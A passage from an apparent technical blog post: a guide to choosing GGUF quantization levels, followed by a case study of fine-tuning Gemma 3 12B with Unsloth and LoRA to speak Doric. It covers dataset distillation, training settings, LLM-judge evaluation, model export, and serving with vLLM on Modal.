`load_in_8bit` This loads the base model in 8-bit. This uses more VRAM than 4-bit, but has higher precision and can be a good choice if you have enough memory. ### Which one do I choose? You normally pick one of these, or neither (both `False`) if you want the base model to be loaded in FP16 (Floating-point 16). The choice **only** affects training-time memory and compute, not the final exported and saved model. Later when you call the following code, Unsloth writes out a standard merged FP16 Hugging Face model - think of this as the base model with the LoRA adaptors baked in. ```python model.save_pretrained_merged( merged_dir, tokenizer, save_method="merged_16bit", ) ``` Any GGUF exports you create afterwards are derived from that merged FP16 checkpoint, not from the 4-bit, or 8-bit training representation. An example of this would be: -> *Load in 8-bit representation of base model for training\ -> save merged FP16 checkpoint (base + LoRA)\ -> export to GGUF with 4-bit quant to get a smaller deployment representation of the trained model* ### Hugging Face model and `merged_16bit` You can think of a Hugging Face model as a folder (or Hub repo) that contains at least: * `config.json` – architecture and hyperparameters * weights – usually one or more `*.safetensors` files * tokenizer files – `tokenizer.json`, `tokenizer_config.json`, `special_tokens_map.json`, etc When you call `from_pretrained`, the following roughly happens: 1. Resolve the model name or Hub URL to a folder, read `config.json` to decide which `transformers` class to instantiate (for example `LlamaForCausalLM`) and with which sizes. Then create an empty model of that shape. 2. Load the weights from the `*.safetensors` (or `pytorch_model.bin`) files into that model. 3. Load the tokenizer from the tokenizer files. After that, you have an in-memory model and tokenizer that you can train or run inference with. When you call the following code, Unsloth does one extra step before writing that folder. ```python model.save_pretrained_merged( merged_dir, tokenizer, save_method="merged_16bit", ) ``` -> Takes the base model weights and applies the **LoRA adapters** from your fine-tune to those weights (merge the deltas into the base).\ -> Save the merged weights to disk in 16-bit floating point (FP16), alongside the config and tokenizer files, as a standard Hugging Face model directory. So you can think of `merged_16bit` as: > \[!note] **base model + LoRA adapters → one FP16 checkpoint in standard Hugging Face format.** Treat this merged FP16 checkpoint as your "canonical high-fidelity checkpoint". All later actions you take on the model, such as GGUF exports, further fine-tunes, comparisons with quantized versions, should conceptually start from this FP16 checkpoint. If you ever regret a quant choice, you come back to this artefact and quantize again. > \[!note] **Quick recap** > > * The training data type (dtype) is an implementation and configuration detail. > * The merged FP16 checkpoint is the artefact that all future actions branch from. > * The deployment quant is how you choose to save and export your model for serving. ## Common GGUF quantization options Here's the common GGUF quant options and when it makes sense to use them. | Quant | Memory usage | Quality vs FP16 | Typical use | |----------|--------------|-----------------------|-----------------------------------------------| | `q8_0` | High | Very close / “safe” | High-quality reference, evals, when VRAM ok | | `q6_k` | Medium | Close | Balanced default for 7B–14B on decent GPUs | | `q5_k_m` | Low | Slight drop | When VRAM is tight but quality still matters | | `q4_k_m` | Very low | Noticeable drop | Helpers, CPUs, very tight VRAM, laptop demos | ### `q8_0` `q8_0` is a near-lossless, 8-bit quant very close to FP16. Use this as a reference export for evals and a safe choice when you are unsure and have enough VRAM (we will cover what *enough* is in a later section). ### `q6_k` `q6_k` is a 6-bit quant method that compresses the model more than `q8_0`, while usually staying close in quality. The “k” just refers to a particular blockwise scheme used in GGUF and is beyond the scope of this post. In practice, `q6_k` is a good balanced default when you are serving 7B–14B models on 24–48 GB GPUs. You save a decent amount of VRAM compared to `q8_0`, but for most chat and assistant workloads the behaviour is still very similar to your FP16 / `q8_0` reference. ### `q5_k_m` `q5_k_m` is a 5-bit quant method that pushes compression a bit further than `q6_k`. It uses a similar blockwise scheme and typically trades a small amount of quality for lower VRAM and higher throughput. In practice, `q5_k_m` is a good option when you are hosting 7B–14B models and are a bit tighter on VRAM or cost. For many chat and assistant-style workloads you will not notice much difference from `q6_k`, but you release more memory for longer context windows, larger batches, or extra models on the same GPU. ### `q4_k_m` `q4_k_m` is a 4-bit quant method and one of the more aggressive options you will see. It gives you a big reduction in model size compared to `q8_0` and `q6_k`, but with a more noticeable quality drop, especially on harder reasoning and code generation tasks. In practice, `q4_k_m` is best used when hardware is the main constraint: CPU-only deployments, small GPUs, or situations where you need to squeeze a larger model onto limited VRAM. It can work very well for helper models (routers, classifiers, retrieval helpers) and lightweight chat, but for small base models (for example 1B–3B) or safety-critical assistants it is usually worth starting with a less aggressive quant like `q6_k` or `q8_0`. ### Other options There are many more GGUF quant names in the wild (`fast_quantized`, `q3_k_m`, `iq2_xxs`, etc). Most of them are either presets that pick one of the schemes above for you, or more extreme 2–3 bit formats for very constrained hardware. If you are just getting started, you can safely ignore them and focus on the four we've covered. ## How to choose a GGUF quant ### Step 0: check model size Model size matters when choosing a quant. Smaller models are generally less capable, so heavily compressing them increases the risk of a noticeable quality drop. They also need far less memory and compute, so you can usually afford a stronger, less aggressive quant as your default. Here are some general guidelines: #### ≤ 3B Prefer `q8_0` or `q6_k` as your main export. Only use `q4_k_m` for very simple classifiers or routers, and only after checking a small eval set. #### 7–8B Default to `q6_k`, but experiment with `q5_k_m` if memory is tight and your evals still look good. #### ≥ 12–13B Choose between `q6_k` and `q5_k_m` based on VRAM and cost. `q4_k_m` is acceptable for non-critical workloads or helper models when you need to squeeze into limited hardware. #### Does FP16 vs GGUF affect this? Not really. The size rules above are about how aggressively you quantize a given base model, based on its parameter count. Your merged FP16 Hugging Face checkpoint is the “truth” model; a GGUF quant is just a compressed version of that checkpoint. The model-size decision is about bits-per-weight × number of parameters, regardless of whether those weights live in a HF folder or a GGUF file. > \[!note] **What about MoE models?** > For MoE (Mixture of Experts) models, be conservative as they are a trap for VRM planning. They are spare in compute but dense in VRAM. > > While they run fast (they only use a fraction of their parameters per token), you must still load every single expert into GPU memory for them to run. > > Ignore the active parameter count and size by them by their total parameter count. For quantization it's important to remember that MoE's are already sparse (similar to compressed) so they can be more sensitive to aggressive quantization. Avoid `q4_k_m` and prefer `q5_k_m` or above to ensure the expert chosen for the token has a useful level of precision. > \[!note] **Thinking vs instruct models** > For "thinking" models or reasoning-focused models that generate longer internal chains of thought, treat them as complex, high-error-cost tasks even if they are not customer-facing. Long reasoning chains tend to amplify small numeric differences, so it is safer to stay with `q6_k` or `q8_0`. Short instruct-style answers, classification and routing are usually more tolerant of `q5_k_m` or `q4_k_m`. ### Step 1: check your hardware Next, sanity-check what your VRAM can hold. As a rough guide for **weights only**: * 7B in FP16 ≈ 14 GB, in `q8_0` ≈ 7 GB, in `q4_k_m` ≈ 3.5 GB * 12B in FP16 ≈ 24 GB, in `q8_0` ≈ 12 GB, in `q4_k_m` ≈ 6 GB On top of the weights you also need VRAM for KV cache (context length × batch size × layers) and activations, so keep at least 30–50% headroom. With that in mind: #### 24–48 GB GPU * For 7B–14B models, `q6_k` is a very comfortable default. * Keep one `q8_0` export around as a high-fidelity reference. * Use `q5_k_m` if you want longer context or multiple models on the same card. #### 8–16 GB GPU or mixed CPU/GPU * Use `q6_k` for the main chat model if it fits with some margin; otherwise drop to `q5_k_m`. * Use `q4_k_m` / `q5_k_m` for helper models (routers, classifiers, retrieval helpers). #### CPU-only / edge / laptop * You will almost always want `q4_k_m` or more aggressive quants here, especially for anything above 3B. * Reserve `q6_k` / `q8_0` for very small models or offline batch jobs where latency is not critical. ### Step 2: check the task The best approach to identifying the right quant for your task is to work back from the following: * How expensive are my mistakes? * How hard is the task? The general rules to apply here are: #### High error cost or complex tasks Use `q6_k` or `q8_0` even on bigger models. Examples: Regulated industries, safety-sensitivity, customer-facing, long-form reasoning, code-generation, multi-step flows #### Low error cost and simplicity `q4_k_m` / `q5_k_m` are usually fine. Examples: retrieval strategy classifiers, router models, intent classifiers. ## Putting it all together When you are staring at a list of GGUF quants, you do not need to remember every detail from this post. You can usually get to a sensible choice by running this checklist: ### Check model size * ≤ 3B: start from `q8_0` or `q6_k`. * 7–8B: start from `q6_k`, consider `q5_k_m` if needed. * ≥ 12–13B (or MoE): choose between `q6_k` and `q5_k_m`, keep `q4_k_m` for helpers and low-risk use. ### Check your hardware * 24–48 GB GPU: `q6_k` as default, keep one `q8_0` export. * 8–16 GB GPU: `q6_k` if it fits, otherwise `q5_k_m`; use `q4_k_m` for helpers. * CPU / edge / laptop: usually `q4_k_m` or more aggressive, especially above 3B. ### Check the task * High error cost or complex reasoning (regulated chat, code, agents, "thinking" models): favour `q6_k` or `q8_0`. * Low error cost and simple tasks (routers, intent classifiers, retrieval helpers): `q4_k_m` / `q5_k_m` are usually fine. In practice, it helps to export two variants the first time you deploy a new model, for example: ```python # Example export loop # Ensure you define hf_token or login via huggingface-cli quant_methods = ["q8_0", "q6_k"] for quant in quant_methods: print(f"Exporting {quant}...") model.push_to_hub_gguf( f"{base_repo_id}-{quant}", tokenizer, quantization_method=quant, token=hf_token, ) ``` Run a small golden set of prompts through both and pick the cheapest quant that hits your quality bar. Keep the `q8_0` (or merged FP16) around as your high-fidelity reference, and use the more compressed quant for day-to-day serving. Over time you will build your own defaults per project, but this simple three-step loop should be enough to stop "which quant do I pick?" from blocking you every time you export a model. ## Advanced: QAT and Dynamic Quants You might see terms like [QAT](https://docs.unsloth.ai/basics/quantization-aware-training-qat) (Quantization Aware Training) or [Dynamic GGUFs](https://unsloth.ai/blog/dynamic-v2) in the Unsloth docs. Here is how they fit into this mental model: ### Dynamic GGUFs When you run `model.save_pretrained_gguf`, Unsloth now defaults to "Dynamic" quantization. This doesn't change your workflow. It just means the "Quant" step is smarter - it keeps sensitive layers in higher precision (e.g., 6-bit) and drops robust layers to lower precision (e.g., 4-bit), giving you better quality at the same file size. ### QAT This is a specific training technique where you simulate quantization errors *during* training so the model learns to adapt to them. It effectively merges the "Training" and "Quant" steps. This is powerful (recovering up to 70% of lost accuracy) but requires a different training setup using `torchao`. For now, treat this as a specialised tool for when standard quants aren't good enough. --- # Fine-tuning an open source LLM to speak Doric A practical case study on fine-tuning a small open-weight LLM with LoRA to speak Doric, from dataset creation and Unsloth training through evaluation to deployment with vLLM/Modal. ## What I did and why I did it I grew up in [Aberdeenshire](https://maps.app.goo.gl/RDzAn4xTxscKPt2T6), in the North-East of Scotland, where a dialect called Doric is spoken. It's a dialect largely confined to the region, and is a blend of Old Norse and Middle English. Living in Sydney I don't get to hear it much, so I decided to fine-tune a small open-weight language model to only speak Doric, as a practical case study in adapting LLMs to niche domains. I built a dataset from both human-written content and distillation from a large model. As with all fine-tuning projects, compiling a dataset is the hardest part and needed iteration. I then trained the model using [Unsloth](https://unsloth.ai) on modest hardware and after many iterations informed by auto and manual evaluation, I deployed it as a serverless endpoint on [Modal](https://modal.com) where I interact with it through a small CLI or web UI. ## What's Doric? Here's some example sentences (taken from the model itself): English: *How's your day going?* Doric: *Aye, it’s been braw enough. Woke up tae the sun strikin the gable, had a bowl o porridge wi a skelp o honey, then set oot tae check the sheep. The quines were daein their usual, scarin the hens and chasin after the tractor. Nae bother, just the normal bletherin and bleatin. Now I’m sittin wi a cuppa, watchin the mist rise aff the fields - peaceful as a dyke at gloamin.* English: *What do you like to do in your free time?* Doric: *Free time? That’s a rare treat roon here. But fan the chores are deen, I like tae wander the burns wi my rod, see if the trout are bitin. Or I’ll fire up the forge and shoe a few horses - the clang o the hammer’s a fine tune. If the weather’s foul, I’ll sit by the peat-fire and read an auld story or twa, maybe scribblin some verses mysel. Aye, simple pleasures, but they keep the wheels turnin.* A bonus outcome of this project is that I've created the world's only [open-source dataset of Doric conversations](https://huggingface.co/datasets/franco334578/doric-conversations). Language preservation matters as speech normalises across the world (which is likely to be accelerated by the rise of AI). ## Why fine-tune instead of just prompting? For many use cases you can get surprisingly far by prompting a large general model and giving it a few examples. That works well when the task is flexible, the domain is broad, and you are happy to pay per token for each request. Fine-tuning starts to make more sense when you care about narrower, repeatable behaviour: specific style or tone, a constrained domain, output formats you want to rely on, or latency and cost at scale. Instead of teaching the model what you want on every prompt, you bake that behaviour into the weights once, then run a smaller or cheaper model that does the right thing by default. In other words, prompting is great for exploration and one-off tools. Fine-tuning is better when you want a specialised model you can reuse, ship, and run efficiently. ## Preparing the dataset ### Conversation topics I used a strong frontier model to generate a wide range of 500 topics that would be used to generate conversations. This gives the model a good range of exposure to Doric. I covered everyday daily life, education, work, technology, science, society and culture, artist and creativity, business and economics, DIY and trades, emotional and personal, jokes, storytelling, debates, and roleplaying. Here's a few examples: * Buying a loaf from the local bakery (everyday life) * Checking symptoms before seeing the GP (health) * Best fish supper in the village (food) * How to ask the boss for a day off (work) * Best spots in town for a cup of tea (social) * Helping gran set up her new phone (technology) * Finding a cheap train ticket to Aberdeen (travel) ### Conversations The conversations were then iteratively distilled from the topics using GPT-5.1. I used a simple template to generate a conversation between a human and the model and outputted the conversations into the ChatML JSONL format. ChatML is largely the standard format for LLM conversations and is supported by many tools and platforms. I wanted to ensure that the input language didn't matter so I generate conversations in multiple languages rather than just English. The output language was always Doric. Extract from the dataset ```json {"messages": [{"role": "user", "content": "Could you give a friendly overview about where to get your hair cut local?"}, {"role": "assistant", "content": "Try the barber in the toon square, quine at the co-op does trims, or yon loon wi shears at the market. Cheap, quick, nae fuss."}], "meta": {"topic": "Where to get your hair cut local", "group": "local_life"}} {"messages": [{"role": "user", "content": "संक्षेप में कृपया Applying for your first summer job समझाइए।"}, {"role": "assistant", "content": "Aye, so ye’re efter yer first simmer job? First, wite a CV, een page: name, school, a guid line aboot yersel, ony prizes ye’ve won. Dinna fash gin it’s short, just keep it clean. Fan ye see a shop sign sayin “pairt-time wanted”, gan in wi a smile, speir tae spik tae the manager, haund ower yer CV. Follow up wi an email twa-three days later. If ye get an interview, dress tidy - jeans nae ripped, shirt ironed. They’ll ask “fit maks ye a guid team player?” Tell them ye’re on yer school hockey squad, aye turn up on time, ken how tae listen. Ask them a wee question back, like “fit shifts are busiest?” That shows ye’re keen. Mind, it’s jist a foot in the door; if it disna work oot, try the next shop. Keep at it, loon or quine, ye’ll land something."}], "meta": {"topic": "Applying for your first summer job", "group": "work_and_study"}} ``` This is where the first issue arose. The distilling LLM was not able to generate conversations in Doric, it output a mixture of Doric, Scots, and English. So I needed to lint the conversations to remove any that were not in Doric. This was a mixture of find-replace and feeding the model the contents of a [Doric dictionary](https://doricphrases.com/phrases.php) and enforcing a number of Doric markers. This approach produced around 2,500 Doric conversations. That is not a large dataset in absolute terms, but for fine-tuning a specialised model the limiting factor is domain coverage and variation, not volume. ## Training and fine-tuning the model To keep things simple I used Unsloth on [Google Colab Pro](https://colab.research.google.com) to fine-tune the model with LoRA adapters. Colab works well here because it's a fast fine-tune with a dataset of this size and it's just a matter of setting up a Jupyter notebook and running through the steps. For longer fine tunes you may want to use a service like [Runpod](https://runpod.io) or [Lambda Labs](https://lambdalabs.com). I used the industry standard [Weights and Biases](https://wandb.ai) platform to track the training and evaluation. > \[!note] **Quick overview of LoRA** > Low-Rank Adaptation (LoRA) is a parameter-efficient fine-tuning method that lets you adapt a large model without updating all of its weights. Instead of modifying the full weight matrices inside the transformer, LoRA injects small trainable low-rank layers alongside the original weights. During training, only these lightweight LoRA layers are updated and the base model remains frozen. > > In practice, this means far fewer trainable parameters, so you can fine-tune on smaller hardware such as a single GPU. The LoRA weights can be merged into the base model or kept as a separate adapter. In short, LoRA gives most of the benefit of full fine-tuning at a fraction of the cost and complexity. > > There is also a related approach called QLoRA, which combines LoRA with 4-bit quantization of the base model to further reduce memory footprint. Unsloth provides many models that can be fine-tuned with QLoRA; look out for model names ending in `-4bit`. ### Choosing a model I started out Unsloth's tune of Google's Gemma 3 4B model as it was the smallest model that was available in Unsloth and I wanted to keep the fine-tune as small and cheap as possible. However after training, I found the model wasn't great for conversational purposes once you started to get into the more complex topics. The goal was still to train a small model so I moved up to the 12B model, the smallest model that felt reliably conversational across the harder topics while still being trainable on limited compute with 4-bit. #### Base models vs Instruct models vs thinking models The general guidelines to follow with picking a model are: * Only choose a base model for research or running a full pre-training or custom instruction tuning pipeline yourself. Base models aren't generally tuned to give structured responses, they can represent knowledge but don't know how to communicate. * If you care about latency and you don't consider your use case to require strong intelligence then choose an instruct model. * If your use case needs more complex multi-step reasoning or higher robustness (for example, long chains of tool calls or careful analysis in high-stakes domains), consider a reasoning model, accepting the extra latency and cost. For this project I started from an instruct chat model, because I care more about conversational behaviour and style than about heavy-weight long-form reasoning. #### Unsloth and quantization At its essence, Unsloth builds on [TRL](https://github.com/huggingface/trl) and PyTorch to provide an optimised fine-tuning pipeline. Unsloth brings some highly valuable optimisations to the table through their [Dynamic 4bit quantization](https://unsloth.ai/blog/dynamic-4bit), we can recover much of the accuracy you lose with naive 4-bit quantization, while staying within a similar memory budget. This allowed me to use the more capable 12B model without experiencing out of memory errors or slow training times. ```python # Loading a model in Unsloth from unsloth import FastModel import torch model, tokenizer = FastModel.from_pretrained( model_name = "unsloth/gemma-3-12b-it", max_seq_length = 2048, load_in_4bit = True, load_in_8bit = False, full_finetuning = False, ) ``` #### 4-bit quantization Most language models store their weights as 16-bit or 32-bit floats, which is a key reason why they use so much memory. By applying 4-bit quantization we shrink the weights down to much smaller 4-bit values, cutting the memory footprint of the model by roughly 4x and making training and inference faster and more efficient. The trade-off is that we lose some of the model's precision, its overall capability, compared to the parent model. For this project, and generally when fine-tuning for specific domains, we can afford to lose some accuracy in order to gain a significant reduction in memory footprint. Our model needs to be great at speaking Doric, not explaining the theory of relativity at a PhD level. > \[!note] **Note on 4-bit models and exporting to vLLM / Transformers** > Unsloth gives you the option to load your model in 4-bit during fine-tuning, which dramatically reduces memory requirements. > > It’s important to understand that there are two types of 4-bit models: > > Dynamic 4-bit quantization of a full-precision model > > * This is the mode used in this Doric project. > > * The underlying model is still FP16/BF16, and Unsloth can safely merge LoRA adapters back into a correct full-precision checkpoint. > > * This export works perfectly with vLLM, Transformers, and GGUF. > Models that are stored as 4-bit, such as `bnb-4bit` variants > > * These do not retain FP16 weights internally, and merging LoRA adapters back into FP16 can produce corrupted weights. > > * They are suitable for inference or PEFT-only workflows, but not for producing full-precision merged checkpoints. > > If your goal is to export a final FP16 model for serving in vLLM or a production inference stack, always start from a full-precision base model, even if you train in 4-bit mode. #### When to use Unsloth vs Axolotl vs PyTorch Unsloth and [Axolotl](https://docs.axolotl.ai/) are frameworks that build on top of [PyTorch](https://pytorch.org/) and provide a higher level of abstraction for fine-tuning models. Unsloth is a good choice when you want to fine-tune small or medium models quickly on a single GPU and care about 4-bit quantization. The framework is at a good level of abstraction and provides a range of helpful utilities for fine-tuning models like chat templates, easy integration with observability platforms like Weights and Biases, and straightforward loading of datasets both locally and from Hugging Face. You'll need some Python knowledge to get the most out of Unsloth, but they do provide a lot of Colab notebooks which cover most common use cases. Axolotl works at a similar level of abstraction but is better suited when you want multi-GPU support or prefer configuration of the pipeline through a YAML file without writing training scripts. It has many baked-in examples and supports a wide range of models and training methods. Using PyTorch directly makes sense when you want full control over the training process but requires a strong prior knowledge of both PyTorch and model training. For this project Unsloth was the best fit because of my Python experience and its speed and memory optimisations. #### Chat templates Chat templates structure interactions between language models and users and are crucial for maintaining conversation structure, role identification, retaining context over multiple turns, and features like tool use. Common templates include ChatML, Alpaca, and ShareGPT. For this project I used ChatML. Here's what that looks like: At a JSONL level my dataset looks like this: ```text "messages": [{ "role": "user", "content": "Hello, how are you?" }, { "role": "assistant", "content": "Nae bad loon" }], "messages": [{ "role": "user", "content": "What's the weather?" }, { "role": "assistant", "content": "Affa dreich oot" }] ``` When Unsloth applies the ChatML template, the model sees this: ```text <|im_start|>system You are a helpful assistant.<|im_end|> <|im_start|>user Hello, how are you?<|im_end|> <|im_start|>assistant Nae bad loon<|im_end|> <|im_start|>user What's the weather?<|im_end|> <|im_start|>assistant Affa dreich oot<|im_end|> ``` The training data must be formatted into the raw string structure (with special tokens) that the base model expects. Unsloth handles this mapping automatically if you provide the ChatML format. ## Evaluating the model Without evaluation we can only judge our training output by going off vibes. I use a mixture of training metrics, and a golden dataset of inputs and ideal outputs covering a range of scenarios, which is then judged by both LLM judges and human manual review. I'm looking for signs of over-fitting (the model performs well on training examples but poorly on unseen scenarios) through to incompetence (the model slips into English or Scots rather than consistent Doric). ### Loss curves and core hyperparameters I logged training and validation loss to Weights & Biases, along with a learning rate schedule. A healthy run typically shows training loss decreasing smoothly and validation loss following it before flattening out. Any sharp spikes usually indicate an unstable learning rate or bad batches, while validation loss flattening quickly and then rising is a classic sign of overfitting. The main hyperparameters I tuned against these curves were the number of warmup steps, learning rate, number of epochs, weight decay, and per-device batch size, plus how often to run evaluation steps. Here's an overview of each hyperparameter with the values I used: **Learning rate (2e-4)** I used a standard QLoRA learning rate. If set too high, the model diverges and destroys the pre-trained knowledge, and if too low it fails to pick up the nuances of the dialect within the training timeframe. **Number of epochs (3)** I limited this to 3 to prevent the model from memorising the dataset (overfitting). This ensures it learns the patterns of Doric rather than just repeating the training phrases. **Warm up steps (10%)** The first 10% of the training steps were used to warm up to gradually increase the learning rate. Without this, starting immediately at a high learning rate would shock the pre-trained weights, causing the loss to spike and the model to forget its foundational English syntax (catastrophic forgetting). The warmup phase effectively tells the optimiser: *"I know the error is currently huge, but ignore it. Make very small changes until we find a stable direction."* **Batch size (8)** This was kept low to ensure the 12B model fit comfortably on any Colab GPU, but this could easily have been pushed higher when more VRAM is available. **Weight decay (0.01)** Applied a small penalty to the weights, promoting more stable learning by keeping the weight updates conservative. This prevents the model from over-optimising on the noisy/synthetic parts of the dataset and overfitting. ```python model = FastModel.get_peft_model( model, finetune_vision_layers = False, finetune_language_layers = True, finetune_attention_modules = True, finetune_mlp_modules = True, r = 16, # Larger = higher accuracy, but might overfit lora_alpha = 16, # Recommended alpha == r lora_dropout = 0.05, bias = "none", random_state = 3407, # Targeting all linear layers (Attention + MLP) improves dialect transfer target_modules=[ "q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj", ] ) ``` My training configuration ```python from trl import SFTTrainer, SFTConfig from datetime import datetime # Generate unique training run name current_time = datetime.now().strftime("%Y%m%d_%H%M%S") run_name_with_time = f"doric_v4_{current_time}" trainer = SFTTrainer( model = model, tokenizer = tokenizer, train_dataset = train_dataset, eval_dataset=eval_dataset, args = SFTConfig( dataset_text_field = "text", max_seq_length = 2048, # Explicitly set context window # Batch size handling per_device_train_batch_size = 8, gradient_accumulation_steps = 4, # 8 * 4 = 32 (Effective Batch Size) # Scheduler warmup_ratio = 0.1, # 10% warmup num_train_epochs = 3, learning_rate = 2e-4, lr_scheduler_type = "linear", weight_decay = 0.01, optim = "adamw_8bit", seed = 3407, # Logging & Eval logging_steps = 10, report_to = "wandb", run_name = run_name_with_time, per_device_eval_batch_size = 8, eval_strategy = "steps", eval_steps = 0.1, # Evaluate every 10% of steps do_eval = True ), ) ``` Total training time on an A100 was ~20minutes, costing less then $1. #### Golden dataset I picked 15-20 question/answer pairs covering our core topics that act as our key indicators of success. The output from our fine-tuned model should be close in style and meaning to the dataset when given the same prompt. It's essential to not use any of the training dataset for the golden dataset otherwise we won't be able to detect signs of overfitting. #### Human review and error analysis Unsloth provides inference through the `FastLanguageModel` helper. This is a good time to sanity check the output before saving the model. I ran prompts from my golden dataset here and manually compared the responses looking for obvious issues like English responses, spelling, and formatting issues. #### LLM as a judge review I now use a strong frontier model to judge the quality of the Doric in the output. What we're really looking for here is a "Is this response valid Doric, yes/no" and then a list of non-Doric words and phrases. Here's an example prompt: ```text You are an expert evaluator of Doric dialect authenticity. Doric is the dialect of North-East Scotland (Aberdeenshire, Moray). ## Key Doric Features Question words: fit (what), far (where), fan (when), fa (who), foo (how/why) Negatives: dinna, canna, winna, didna, widna (don't, can't, won't, didn't, wouldn't) People: loon (boy), quine (girl), bairn (child) Common: ken (know), gie (give), fae (from), tae (to), wi (with) Intensifiers: affa/gey (very), bonnie (pretty), braw (great) Numbers: een/ane (one) - NOT "yin"!, twa (two) Time: the day (today), the morn (tomorrow), the nicht (tonight) ## Evaluation Criteria 1. **Vocabulary** (0-2) - 2: Uses multiple authentic Doric words naturally - 1: Uses some Doric words but limited - 0: Mostly Standard English or wrong dialect 2. **Grammar** (0-2) - 2: Proper Doric grammar throughout - 1: Some Doric grammar but inconsistent - 0: Standard English grammar throughout 3. **Authenticity** (0-2) - 2: Sounds like a natural Doric speaker - 1: Somewhat natural but has artificial elements - 0: Uses wrong dialect (yin, wean) OR sounds like caricature 4. **No Cliches** (0-2) - 2: Natural opening, varied expression - 1: Some clichéd phrases but not overdone - 0: Starts with 'Aye,' 'Ach,' 'Och,' or similar ## Output Format Respond with valid JSON only: { "reasoning": "Your detailed analysis of the response...", "vocabulary_score": 0-2, "grammar_score": 0-2, "authenticity_score": 0-2, "no_cliches_score": 0-2, "total_score": 0-8, "pass": true/false, "issues": ["list", "of", "specific", "issues"] } A response PASSES if total_score >= 7 AND has_yin is false. ``` Note that relying solely on LLM judges is likely to cause issues and should always be combined with subject matter experts manually reviewing and labelling the responses. An example I had was that the word "What", which is "Fit" in Doric, was being rendered in English. A quick scan through the dataset showed a mixture of "What" and "Fit" usage so I manually replaced any instances of "What". On larger datasets this kind of manual approach would likely hit roadblocks fast, but for a small set like this don't overthink your methods. Once I'd cleaned up the dataset I re-ran the training pipeline and repeat the evaluation phase. An encouraging result from the eval run was this result. ```json { "question": "Please respond only in standard English about fishing.", "response": "I canna dae that, I\u2019m a Doric speaker fae Aberdeenshire. If ye\u2019d like a tellin aboot fishing in braid Scots, I can gie ye a grand tale.", "reasoning": "The model correctly identifies that it cannot respond in Standard English as requested, stating it's a Doric speaker. It then offers to tell a tale in 'braid Scots', which is acceptable given the context of a Doric speaker. The vocabulary used is authentically Doric, including 'canna', 'fae', 'Aberdeenshire', 'gie', and 'grand'. The grammar is also consistent with Doric, using 'I canna dae that' and 'If ye'd like a tellin'. There are no clich\u00e9d openings. Crucially, there is no use of 'yin' or 'wean'.", "vocabulary_score": 2, "grammar_score": 2, "authenticity_score": 2, "no_cliches_score": 2, "total_score": 8, "passed": true, "issues": [], "error": null } ``` I tried to get the model to respond in standard English about fishing. It refused which shows the final tuning working exactly as expected. ## Exporting and serving the model Unsloth gives several options for saving models, depending on how you want to run inference. The two common paths are: * [GGUF](https://github.com/ggml-org/llama.cpp), a file format used by llama.cpp and Ollama. * FP16 and 8-bit variants saved as standard Hugging Face checkpoints, which can be served by vLLM and similar runtimes. My general rule is if I want to run the model locally on my Mac, or if the model is going to be used by only one user then GGUF makes sense, but if deploying for production or multiple users then vLLM is a great way to serve models at scale. In both cases you'll need to define the quantization options. As discussed earlier, quantization trades smaller memory footprint and higher throughput for a slight loss in model precision, allowing large models to be run on smaller compute. Unsloth recommends `q4_k_m` and `q5_k_m` which worked well for this project, but note that quantization can hurt smaller models disproportionately. For models around 3B or smaller, test in FP16/8-bit first, then treat 4-bit as an optional optimisation, not the default. You can also choose to save only the LoRA adapters rather than a full merged model. That keeps the artefact small and lets other people combine your adapters with different base checkpoints, but it does assume they already have access to the same base model. For convenience I exported a fully merged checkpoint as well as LoRA adapters for this Doric model. ```python tokenizer.save_pretrained("gemma-3-doric") from google.colab import userdata hf_token = userdata.get("HF_TOKEN") # ------------------------------------------------------------------- # 1) Optional: save a non-merged LoRA copy locally # ------------------------------------------------------------------- save_lora_copy_local = True if save_lora_copy_local: lora_dir = "gemma-3-12b-doric-lora" model.save_pretrained(lora_dir) tokenizer.save_pretrained(lora_dir) print("Saved LoRA+config to", lora_dir) # ------------------------------------------------------------------- # 1b) LoRA-only adapter repo on HF # ------------------------------------------------------------------- save_lora_to_hf = True if save_lora_to_hf: lora_repo_id = "franco334578/doric-12b-it-lora" model.push_to_hub( lora_repo_id, tokenizer, save_method="lora", token=hf_token, ) print("Pushed LoRA adapter to HF repo:", lora_repo_id) # ------------------------------------------------------------------- # 2) FP16 merged export for vLLM # ------------------------------------------------------------------- save_merged_fp16 = True if save_merged_fp16: merged_dir = "doric-12b-it-fp16" model.save_pretrained_merged( merged_dir, tokenizer, save_method="merged_16bit", ) print("Saved merged FP16 model to", merged_dir) # ------------------------------------------------------------------- # 3) Push merged FP16 to Hugging Face to be served by vLLM # ------------------------------------------------------------------- hf_repo_id = "franco334578/doric-12b-it-fp16" model.push_to_hub_merged( hf_repo_id, tokenizer, save_method="merged_16bit", token=hf_token, ) print("Pushed merged FP16 model to HF repo:", hf_repo_id) # ------------------------------------------------------------------- # 4) Optional: GGUF export to Hugging Face to be served by Ollama / llama.cpp # ------------------------------------------------------------------- save_gguf = True if save_gguf: gguf_repo_id = "franco334578/doric-12b-it-gguf" model.push_to_hub_gguf( gguf_repo_id, tokenizer, quantization_method=["q4_k_m"], # For models around 3B or smaller, test in FP16/8-bit first (e.g. f16, q8_0), then treat 4-bit (q4_k_m) as an optional optimisation, not the default. token=hf_token, ) print("Pushed GGUF model to HF repo:", gguf_repo_id) ``` Once the model is exported I push it to Hugging Face. You'll need a Hugging Face write token for your organisation and remember that if you're pushing a model for the first time that it will be public. ### Serving the model on Modal [Modal](https://modal.com/) lets you run serverless deployments of models so you can scale down the deployment to zero when idle. Alternatives to Modal include [Runpod](https://www.runpod.io/) and other GPU hosting platforms. For this project I used Modal with vLLM to expose the Doric model behind an OpenAI-compatible HTTP API. Modal also offers $30 of free credit, which is enough for several hours of experimentation with small models. When the model is exported and served, we can just call the OpenAI-compatible endpoint and the client library automatically applies the correct template, so we just send the standard messages list. ```json {"messages": [{"role": "user", "content": "Hello, how are you?"}]} ``` Here's a nice guide for [deploying your model with OpenAI-compatible endpoints on Modal](https://modal.com/docs/examples/vllm_inference). I used an L40S GPU for this deployment. It's essential at this point to run the evaluation pipeline again to ensure the model is performing as expected after export. ### Watch-outs If the output you're seeing from the exported model is worse than the results you were getting from Unsloth inference then the likely issue is a mismatch with chat templates. Here's a [great guide](https://docs.unsloth.ai/basics/inference-and-deployment/saving-to-gguf#running-in-unsloth-works-well-but-after-exporting-and-running-on-other-platforms-the-results-are-poo) to what probably went wrong. ## What next? The model still has inconsistencies and drops in some Scots, which is expected when using distillation on such a niche topic. Working with a linguist specialising in Doric to refine the dataset would likely improve the model. That would likely focus on cleaning edge cases, agreeing on preferred spellings, and designing a richer evaluation set 